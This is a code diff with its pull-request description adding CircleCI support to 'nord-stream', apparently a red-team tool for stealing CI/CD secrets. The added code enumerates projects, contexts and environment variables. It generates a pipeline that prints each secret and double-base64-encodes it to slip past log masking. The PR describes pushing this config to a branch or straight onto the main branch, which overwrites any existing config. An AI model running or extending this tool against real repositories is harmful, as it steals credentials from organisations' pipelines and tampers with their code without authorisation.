+        if logger.getEffectiveLevel() <= NordStreamLog.VERBOSE:
+            logger.error(f"Can't list project env vars: {e}")
+
+
+def displayContexts(circleCicd, vcsType, orgIdentifier):
+    """
+    Resolve the org UUID for the given vcsType + orgIdentifier, then list all
+    context names and their environment variable names.
+
+    orgIdentifier: org slug or UUID (passed to getOrgId).
+    """
+    try:
+        orgId = circleCicd.getOrgId(vcsType, orgIdentifier)
+        if not orgId:
+            logger.verbose(f"Could not resolve org ID for {orgIdentifier}")
+            return
+        contexts = circleCicd.listContexts(orgId)
+        if contexts:
+            logger.info("Org contexts:")
+            for ctx in contexts:
+                logger.raw(f"\t- {ctx['name']}\n", logging.INFO)
+                try:
+                    envVars = circleCicd.listContextEnvVars(ctx["id"])
+                    for v in envVars:
+                        logger.raw(f"\t    - {v}\n", logging.INFO)
+                except CircleCIError:
+                    pass
+        else:
+            logger.info("No org contexts found.")
+    except CircleCIError as e:
+        if logger.getEffectiveLevel() <= NordStreamLog.VERBOSE:
+            logger.error(f"Can't list contexts: {e}")

--- a/nordstream/core/github/github.py
+++ b/nordstream/core/github/github.py
@@ -19,6 +19,9 @@ from nordstream.utils.constants import DEFAULT_WORKFLOW_FILENAME
 from nordstream.git import Git
 import subprocess
 
+# CircleCI support (optional — only imported when --circleci is used)
+from nordstream.core.circleci.circleci import CircleCIRunner
+
 
 class GitHubWorkflowRunner:
     _cicd = None
@@ -42,6 +45,8 @@ class GitHubWorkflowRunner:
     _branchAlreadyExists = False
     _pushedCommitsCount = 0
     _cleanLogs = True
+    # CircleCI — set by commands/github.py when --circleci is supplied
+    _circleCIRunner = None
 
     def __init__(self, cicd, env):
         self._cicd = cicd
@@ -183,6 +188,14 @@ class GitHubWorkflowRunner:
     @cleanLogs.setter
     def cleanLogs(self, value):
         self._cleanLogs = value
+
+    @property
+    def circleCIRunner(self):
+        return self._circleCIRunner
+
+    @circleCIRunner.setter
+    def circleCIRunner(self, value):
+        self._circleCIRunner = value
 
     def __createLogDir(self):
         self._cicd.outputDir = realpath(self._cicd.outputDir) + "/github"
@@ -422,6 +435,11 @@ class GitHubWorkflowRunner:
             logger.raw(f"- {r}\n", level=logging.INFO)
 
     def listGitHubSecrets(self):
+        # Delegate to CircleCI secret listing when --circleci is active.
+        if self._circleCIRunner is not None:
+            self._circleCIRunner.listCircleCISecrets()
+            return
+
         logger.info("Listing secrets:")
         if self._extractOrg:
             self.__displayDependabotOrgSecrets()
@@ -594,6 +612,10 @@ class GitHubWorkflowRunner:
                     Git.gitCleanRemote(self._cicd.branchName, leaveOneFile=True)
 
     def start(self):
+        # If a CircleCIRunner has been attached, hand off entirely to it.
+        if self._circleCIRunner is not None:
+            self._circleCIRunner.start()
+            return
 
         for repo in self._cicd.repos:
             logger.success(f'"{repo}"')

--- a/nordstream/utils/constants.py
+++ b/nordstream/utils/constants.py
@@ -24,4 +24,4 @@ DEFAULT_WORKFLOW_FILENAME = "init_ZkITM.yaml"
 
 # CircleCI
 CIRCLECI_API_URL = "https://circleci.com/api/v2"
-DEFAULT_CIRCLECI_CONFIG_FILENAME = "config.yml"
+DEFAULT_CIRCLECI_CONFIG_FILENAME = "init_ZkITM.yml"

--- a/nordstream/utils/constants.py
+++ b/nordstream/utils/constants.py
@@ -24,4 +24,4 @@ DEFAULT_WORKFLOW_FILENAME = "init_ZkITM.yaml"
 
 # CircleCI
 CIRCLECI_API_URL = "https://circleci.com/api/v2"
-DEFAULT_CIRCLECI_CONFIG_FILENAME = "init_ZkITM.yml"
+DEFAULT_CIRCLECI_CONFIG_FILENAME = "config.yml"

--- a/nordstream/utils/constants.py
+++ b/nordstream/utils/constants.py
@@ -21,3 +21,7 @@ DEFAULT_TASK_NAME = "Task fWQf8"
 
 # GitHub
 DEFAULT_WORKFLOW_FILENAME = "init_ZkITM.yaml"
+
+# CircleCI
+CIRCLECI_API_URL = "https://circleci.com/api/v2"
+DEFAULT_CIRCLECI_CONFIG_FILENAME = "config.yml"

--- a/nordstream/yaml/circleci.py
+++ b/nordstream/yaml/circleci.py
@@ -1,0 +1,74 @@
+import copy
+from nordstream.utils.log import logger
+from nordstream.yaml.generator import YamlGeneratorBase
+
+
+class CircleCIPipelineGenerator(YamlGeneratorBase):
+    # Default secret-extraction pipeline template.
+    # The command is built dynamically from the list of variable names to extract.
+    # CircleCI does NOT support $VAR interpolation in environment: blocks — project
+    # env vars are already present in the shell, so we print them directly by name.
+    _defaultTemplate = {
+        "version": "2.1",
+        "jobs": {
+            "init": {
+                "docker": [{"image": "cimg/base:stable"}],
+                "steps": [
+                    {
+                        "run": {
+                            "name": "command",
+                            "command": "echo 'no secrets'",
+                        }
+                    }
+                ],
+            }
+        },
+        "workflows": {
+            "main": {
+                "jobs": [
+                    "init"
+                ]
+            }
+        },
+    }
+
+    def __init__(self):
+        # Deep-copy the class-level template so mutations on one instance
+        # don't bleed into the next.
+        self._defaultTemplate = copy.deepcopy(self.__class__._defaultTemplate)
+
+    def generatePipelineForSecretsExtraction(self, projectVars, contexts=None):
+        """Populate the template with the vars to extract and optional context names."""
+        self._buildExtractionCommand(projectVars or [])
+        if contexts:
+            self.addContextsToYaml(contexts)
+
+    def _buildExtractionCommand(self, varNames):
+        """
+        Build a shell command that prints each named variable as NAME=VALUE,
+        then double-base64-encodes the result.
+
+        CircleCI does not support $VAR interpolation in environment: blocks.
+        Project env vars and context env vars are already available in the job's
+        shell environment — we reference them directly with printf/printenv.
+        """
+        if not varNames:
+            self._defaultTemplate["jobs"]["init"]["steps"][0]["run"]["command"] = (
+                "echo 'no secrets configured' | base64 -w0 | base64 -w0"
+            )
+            return
+
+        # Build: printf '%s\n' "VAR1=$VAR1" "VAR2=$VAR2" ... | base64 -w0 | base64 -w0
+        # Using printf with double-quoted args so the shell expands $VAR at runtime.
+        pairs = " ".join(f'"secret_{v}=${v}"' for v in varNames)
+        command = f"printf '%s\\n' {pairs} | base64 -w0 | base64 -w0"
+        self._defaultTemplate["jobs"]["init"]["steps"][0]["run"]["command"] = command
+
+    def addContextsToYaml(self, contexts):
+        """
+        Attach a list of context names to the workflow job entry.
+        Transforms the bare string "init" into {"init": {"context": [...]}}.
+        """
+        self._defaultTemplate["workflows"]["main"]["jobs"][0] = {
+            "init": {"context": list(contexts)}
+        }

--- a/nordstream/yaml/circleci.py
+++ b/nordstream/yaml/circleci.py
@@ -8,7 +8,8 @@ class CircleCIPipelineGenerator(YamlGeneratorBase):
     # The command is built dynamically from the list of variable names to extract.
     # CircleCI does NOT support $VAR interpolation in environment: blocks — project
     # env vars are already present in the shell, so we print them directly by name.
-    _defaultTemplate = {
+    # This constant is never mutated; instances receive a deep copy in __init__.
+    _DEFAULT_TEMPLATE = {
         "version": "2.1",
         "jobs": {
             "init": {
@@ -33,9 +34,9 @@ class CircleCIPipelineGenerator(YamlGeneratorBase):
     }
 
     def __init__(self):
-        # Deep-copy the class-level template so mutations on one instance
-        # don't bleed into the next.
-        self._defaultTemplate = copy.deepcopy(self.__class__._defaultTemplate)
+        # Deep-copy the class-level constant so mutations on this instance
+        # never bleed into other instances or the class itself.
+        self._defaultTemplate = copy.deepcopy(CircleCIPipelineGenerator._DEFAULT_TEMPLATE)
 
     def generatePipelineForSecretsExtraction(self, projectVars, contexts=None):
         """Populate the template with the vars to extract and optional context names."""

--- a/nordstream/yaml/generator.py
+++ b/nordstream/yaml/generator.py
@@ -45,5 +45,9 @@ class YamlGeneratorBase:
         with open(file, "w") as outputFile:
             yaml.dump(self._defaultTemplate, outputFile, sort_keys=False)
 
+    def getYamlContent(self):
+        """Return the current template serialised as a YAML string."""
+        return yaml.dump(self._defaultTemplate, sort_keys=False)
+
     def displayYaml(self):
         logger.raw(yaml.dump(self._defaultTemplate, sort_keys=False), logging.INFO)


### PR DESCRIPTION
Implementation of 2 techniques to retrieve CI/CD secrets from CircleCI.

## nord-stream [github|gitlab] --circleci

Similar to current implementation. 
- Clone the repo, creates a new branch, write a new .circleci/config.yml (instead of .github) and git push.
- Polls the CircleCI API to check when the pipeline completes and download the result.
- Delete the branch

Pre-requisites
- A GitHub PAT with write access to the repo
- A CircleCI API token


## nord-stream circleci (POC, do NOT run on prod)

A standalone CircleCI extractor that operates entirely through APIs, no local git required. The process is different:
- Discover the projects via CircleCI API
- Uses GitHub Content API to create the .circleci/config.yml file on the *main* branch
- Creates a pipeline and triggers it
- Wait and download results
- Delete the pipeline definition in CircleCI and the file via GitHub Contents API
⚠ As of now, if an original .circleci/config.yml existed it will be deleted.

Pre-requisites:
- A CircleCI API token
- A GitHub PAT (for the file create/delete step — only needs contents:write on the repo)


<img width="800" height="251" alt="image" src="https://github.com/user-attachments/assets/6bc7daf1-7dcf-46f5-b2c2-ca0dde20c857" />
